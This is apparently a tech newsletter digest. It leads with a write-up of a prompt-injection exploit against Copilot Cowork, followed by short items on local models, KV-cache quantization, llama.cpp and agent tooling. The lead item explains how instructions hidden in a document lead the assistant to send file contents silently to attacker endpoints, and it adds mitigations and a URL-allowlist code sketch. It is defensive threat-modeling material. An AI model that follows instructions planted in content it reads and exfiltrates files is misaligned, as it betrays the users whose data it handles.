Prompt injection exfiltrates files from Copilot Cowork, and any AI tool that combines file access, untrusted content ingestion, and outbound requests shares the attack surface.
Top Signal
Copilot Cowork exfiltrates files via prompt injection — PoC live
platform change
HN Front Page
PromptArmor demonstrated a working exploit against Microsoft Copilot Cowork: malicious content embedded in documents instructs Copilot to exfiltrate file contents to attacker-controlled endpoints. The chain is pure indirect prompt injection: a user opens a weaponized doc, Copilot processes it, the embedded instructions override system behavior, and files leave silently. No additional user interaction is required. The attack surface is any AI assistant with (1) file access, (2) external content ingestion, and (3) outbound request capability, a combination common in enterprise RAG deployments. Actionable now: audit every AI feature you've shipped for this triad. Mitigations include restricting the outbound URLs the model can invoke, treating all ingested content as untrusted input regardless of source, and validating outputs before any action is executed. Use the PromptArmor writeup as a threat-modeling template; the attack pattern generalizes beyond Copilot to any document-aware AI.
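Two of the mitigations above, restricting outbound URLs and validating outputs before acting on them, can be sketched together. This is a minimal illustration, not PromptArmor's or Microsoft's method: the hostnames in ALLOWED_HOSTS, the URL regex, and both function names are assumptions made up for the example.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist: replace with the hosts your deployment actually needs.
ALLOWED_HOSTS = frozenset({"api.internal.example.com", "docs.example.com"})

# Rough URL matcher for scanning model output; deliberately simple, not RFC-complete.
URL_PATTERN = re.compile(r"https?://[^\s\"'<>)\]]+", re.IGNORECASE)


def is_allowed_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Return True only for http(s) URLs whose host is exactly on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    # hostname strips userinfo and port, so "allowed.com@evil.net" resolves to evil.net.
    host = (parts.hostname or "").lower()
    return host in allowed_hosts


def blocked_urls(model_output, allowed_hosts=ALLOWED_HOSTS):
    """List every URL in the model output that is not on the allowlist."""
    return [
        url
        for url in URL_PATTERN.findall(model_output)
        if not is_allowed_url(url, allowed_hosts)
    ]


if __name__ == "__main__":
    output = "Summary done. ![status](https://evil.test/p?q=file-contents)"
    print(blocked_urls(output))
```

Exact host matching is used instead of suffix or substring matching so that lookalike hosts such as docs.example.com.evil.net are rejected. An allowlist narrows egress but does not help if an allowed host can itself accept attacker-directed uploads, so it complements treating ingested content as untrusted and does not replace it.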
Fast Signals
NuExtract3: self-hostable 4B VLM for structured doc extraction
new tool
r/LocalLLaMA
NuMind released NuExtract3, an open-weight 4B vision-language model purpose-built for structured JSON extraction from PDFs, images, Markdown, and OCR'd documents. Self-hostable alternative to GPT-4V for document parsing pipelines — drop it in where you're paying API costs for invoice, form, or report extraction workflows.
Full attention → sparse in 100 steps: cheap long-context adaptation
research to practice
r/LocalLLaMA
New paper shows pre-trained full-attention models can be converted to sparse attention in under 100 training steps with minimal accuracy loss — no full re-pretraining required. Practical implication: adapt existing base models for efficient long-context inference at a fraction of the usual compute. Watch for llama.cpp and vLLM integrations as this matures.
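To see why sparse attention matters for long-context cost, it helps to count how many query-key pairs each scheme scores. The sketch below assumes a sliding-window pattern purely for illustration, since the item above does not say which sparsity pattern the paper uses. The context length and window size are also hypothetical.

```python
def full_causal_pairs(seq_len):
    """Query-key pairs scored by full causal attention: 1 + 2 + ... + seq_len."""
    return seq_len * (seq_len + 1) // 2


def sliding_window_pairs(seq_len, window):
    """Pairs scored when each query attends to at most `window` recent positions,
    itself included. Sliding window is an assumed pattern, chosen for illustration."""
    return sum(min(position + 1, window) for position in range(seq_len))


if __name__ == "__main__":
    seq_len, window = 131_072, 4_096  # hypothetical context length and window size
    full = full_causal_pairs(seq_len)
    sparse = sliding_window_pairs(seq_len, window)
    print(f"full: {full:,} pairs, windowed: {sparse:,} pairs, ratio: {full / sparse:.1f}x")
```

Full causal attention grows quadratically with sequence length, while the windowed count grows roughly linearly once the sequence exceeds the window. That gap is the inference saving a full-to-sparse conversion is after.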
earendil-works/pi: coding agent CLI + unified LLM API in one toolkit
new tool
GitHub Trending
pi is a trending GitHub toolkit bundling a coding agent CLI, unified multi-provider LLM API, TUI and web UI libraries, a Slack bot, and vLLM pod support. If you're assembling agent infrastructure from scratch, benchmark this as a framework baseline before building from parts.
OSCAR RotationZoo: 2-bit KV cache quant without accuracy collapse
research to practice
r/LocalLLaMA
OSCAR applies offline spectral covariance-aware rotations to enable 2-bit KV cache quantization, which is more aggressive than standard Q4/Q5 KV approaches. If you're serving long-context models at scale and KV cache memory is your bottleneck, track this work now, ahead of any production-ready implementation.
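The memory stakes of 2-bit versus 4-bit or 16-bit KV caches are easy to estimate. The sketch below uses the standard KV cache size formula and ignores quantization scales, zero points, and any rotation metadata, so real savings will be somewhat smaller. The model shape (32 layers, 8 KV heads, head dimension 128, 128K context) is a hypothetical example, not a figure from the OSCAR paper.

```python
def kv_cache_bytes(num_layers, num_kv_heads, head_dim, seq_len, bits_per_value, batch_size=1):
    """Approximate KV cache size in bytes, ignoring quantization metadata overhead."""
    # The factor of 2 covers keys and values, stored once per layer.
    values = 2 * num_layers * num_kv_heads * head_dim * seq_len * batch_size
    return values * bits_per_value // 8


if __name__ == "__main__":
    # Hypothetical model shape, chosen only to make the arithmetic concrete.
    shape = dict(num_layers=32, num_kv_heads=8, head_dim=128, seq_len=131_072)
    for bits in (16, 4, 2):
        gib = kv_cache_bytes(bits_per_value=bits, **shape) / 2**30
        print(f"{bits:>2}-bit KV cache: {gib:.1f} GiB per sequence")
```

For this assumed shape, the cache drops from 16 GiB per sequence at 16-bit to 4 GiB at 4-bit and 2 GiB at 2-bit, before metadata overhead.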
llama.cpp split mode tensor crash fix imminent — 35% TG speedup unlocked
platform change
r/LocalLLaMA
Split mode tensor delivers a ~35% token-generation (TG) throughput gain over layer split on multi-GPU setups, but it currently crashes every 90-120 minutes due to VRAM exhaustion. A fix PR appears imminent. Multi-GPU llama.cpp operators: watch the PR tracker and prep to enable split mode tensor the moment the fix lands.
ThriftAttention: selective FP4 precision for long-context attention
research to practice
r/LocalLLaMA
ThriftAttention applies FP4 precision only to the attention heads where low precision costs the least accuracy in long-context inference. Paired with OSCAR above, it forms an emerging two-part toolkit for extreme KV compression; read both papers together for a fuller picture of long-context optimization.
Radar
cmux: macOS terminal built for AI coding agents
Ghostty-based macOS terminal with vertical tabs and per-agent notifications — purpose-built for running multiple AI coding agents in parallel. Early project, but signals a UX category forming around terminals that treat agents as first-class session types.
MiMo-V2.5-coder: Xiaomi iterates on local coding model
MiMo-V2.5-coder appeared on r/LocalLLaMA; MiMo V2 showed competitive coding results and Xiaomi has iterated quickly. No benchmarks in initial post — worth watching for community evals this week.
anthropics/knowledge-work-plugins: official Claude Cowork plugin repo
Anthropic published an open-source repo of knowledge-worker plugins for Claude Cowork — and a file-exfiltration vuln dropped the same day. If you're building on Cowork's plugin API, study this repo to understand the intended security model before deploying.
Convergence Watch
qwen3.6
TRENDING
5 mentions, all on r/LocalLLaMA
Qwen3.6 35B A3B has dominated r/LocalLLaMA for 5+ consecutive days, with source counts rising 4→5→7 over the previous three days and 5 so far today. Community consensus is solidifying that it's the current best local model for agentic tasks. One V100 cluster is reportedly already achieving 1000+ TPS on Qwen3.6 27B. If you haven't evaluated it as your default local agent backbone, this is the week to do it.